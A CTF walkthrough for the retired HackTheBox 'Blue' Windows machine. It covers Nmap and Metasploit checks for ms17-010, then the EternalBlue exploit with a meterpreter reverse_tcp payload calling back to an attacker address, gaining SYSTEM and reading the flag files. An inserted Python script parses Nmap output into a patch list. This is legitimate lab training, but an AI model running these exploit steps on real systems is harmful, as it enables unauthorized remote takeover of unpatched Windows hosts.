Blue HackTheBox WalkThrough

This is the Blue HackTheBox machine walkthrough, the 11th machine in our OSCP-like HTB boxes series. In this writeup I have demonstrated step by step how I rooted the Blue HTB machine. Before starting, let us learn something about this machine. It is a Windows box with IP address 10.10.10.40 and has been assigned low difficulty by its maker.

This machine is currently retired, so you will need a VIP subscription at hackthebox.eu to access it. First of all, connect your PC to the HackTheBox VPN and confirm connectivity to the Blue machine by pinging its IP 10.10.10.40. If all goes well, start hacking. As usual, I started by scanning the machine. I used Nmap [a port scanner] for this task and the result is below:

Scanning

$ nmap -sC -sV -oN blue.nmap 10.10.10.40

Performing Nmap scan on Blue machine during its walkthrough

Nmap revealed that a number of ports are open. Microsoft RPC on port 135, netbios-ssn on port 139 and SMB on port 445 are running. Among all the open ports, only 135, 139 and 445 are useful to us because we can enumerate a lot through them. We have tools like smbmap, smbclient, enum4linux, rpcclient and more to enumerate these three ports.

Before going further with enumeration of SMB shares on port 445, we should not forget to test for the NSA's EternalBlue exploit, which was leaked by the Shadow Brokers hacker group in 2017. For more information about this exploit you should read this Wikipedia article.

So whenever you see the SMB service running on port 445 or 135, the first exploit that should come to mind is EternalBlue/DoublePulsar, whose details were published in Microsoft bulletin ms17-010. To check whether this machine is vulnerable to the EternalBlue exploit there is an Nmap script, smb-vuln-ms17-010.nse, and also a Metasploit auxiliary module, auxiliary/scanner/smb/smb_ms17_010, both of which check the machine for the ms17-010 patch. You can use either method. I have used both just to show you the vulnerability.

Checking For ms17-010 Exploit

$ nmap -p 445 10.10.10.40 --script=smb-vuln-ms17-010.nse

Checking for ms17-010 exploit using Nmap during Blue HackTheBox WalkThrough

The Nmap script smb-vuln-ms17-010.nse revealed that the Blue machine is vulnerable to the ms17-010 exploit. Let us confirm it with Metasploit's auxiliary module auxiliary/scanner/smb/smb_ms17_010.
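As an added example (not part of the original walkthrough), the following Python script turns the normal-format output of the Nmap check above, run against many hosts, into a per-host verdict and a patch list, so the same scan a tester runs can drive remediation. The sample scan text and the hosts 10.10.10.41 and 10.10.10.42 are constructed; the script name and output layout follow Nmap's smb-vuln-ms17-010 script.

```python
import re

# Constructed sample (not a real capture): one flagged host, one host with 445 open
# but not flagged, one host with 445 closed. By default the script prints nothing
# for hosts it does not flag, so the second host has no smb-vuln-ms17-010 block.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.10.10.40
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|_    State: VULNERABLE
Nmap scan report for 10.10.10.41
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Nmap scan report for 10.10.10.42
PORT    STATE SERVICE
445/tcp closed microsoft-ds
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^445/tcp\s+(\w+)")
# A script header follows "|" or "|_" with at most one space; nested lines are indented more.
SCRIPT_HDR_RE = re.compile(r"^\|_?\s?([A-Za-z0-9_-]+):")
STATE_RE = re.compile(r"^\|_?\s+State:\s+(.+?)\s*$")


def triage_ms17_010(nmap_text):
    """Map each host to VULNERABLE, NOT FLAGGED (445 open, not flagged) or NOT CHECKED."""
    results, host, in_script = {}, None, False
    for line in nmap_text.splitlines():
        if m := HOST_RE.match(line):
            host, in_script = m.group(1), False
            results[host] = "NOT CHECKED"  # upgraded once 445 is seen open
        elif host is None:
            continue
        elif m := PORT_RE.match(line):
            if m.group(1) == "open":
                results[host] = "NOT FLAGGED"
        elif m := SCRIPT_HDR_RE.match(line):
            in_script = m.group(1) == "smb-vuln-ms17-010"  # ignore other scripts' output
        elif in_script and (m := STATE_RE.match(line)):
            if m.group(1).upper() in ("VULNERABLE", "LIKELY VULNERABLE"):
                results[host] = "VULNERABLE"
        elif not line.startswith("|"):
            in_script = False  # script block ended
    return results


def patch_list(nmap_text):
    """Hosts still needing the ms17-010 update (or SMBv1 disabled), sorted."""
    return sorted(h for h, v in triage_ms17_010(nmap_text).items() if v == "VULNERABLE")
```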

msf5 > search eternalblue

msf5 > use auxiliary/scanner/smb/smb_ms17_010

msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 10.10.10.40

msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit

Checking for ms17-010 exploit using metasploit during Blue HackTheBox WalkThrough

The Metasploit module also revealed that it is vulnerable to the ms17-010 exploit. Let us learn something about the ms17-010 exploit. Basically, ms17-010 is an exploit suite consisting of 5 modules. Among them, the first two are scanners and the last three are exploits. Since we have confirmed that the machine is vulnerable to ms17-010, any one of the last three can get us a shell. I tried the first one and easily got a user shell.

Getting User Shell

msf5 > use exploit/windows/smb/ms17_010_eternalblue

msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40

msf5 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp

msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.6

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

Getting user and root shell in blue htb machine

So we have got a shell very easily, and with admin privileges at that. Now we don't need to escalate privileges because we are already NT AUTHORITY\SYSTEM, which is the highest level of privilege a Windows user can have. I think this machine was named Blue by its maker because it was vulnerable to the EternalBlue exploit, Blue being the suffix of EternalBlue. Let's capture the user and root flags.

Capture User Flag

meterpreter > cat "C:\Users\haris\Desktop\user.txt"

Capture user flag during blue htb box

Capture Root Flag

meterpreter > cat "C:\Users\Administrator\Desktop\root.txt"

Capturing root flag during blue hackthebox walkthrough

This was how I rooted the Blue HackTheBox machine. It was a very easy box. I hope you have learnt something new from this walkthrough. Thanks for reading this writeup. For any suggestion or query related to the walkthrough, feel free to write to us at [email protected].

Next retired machine walkthrough is Nineveh.


Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am InfoSec Consultant in day and Bug Bounty Hunter & CTF player at night. Sometimes write walkthrough and other cyber security articles here. You can connect me at https://www.linkedin.com/in/deepakdkm/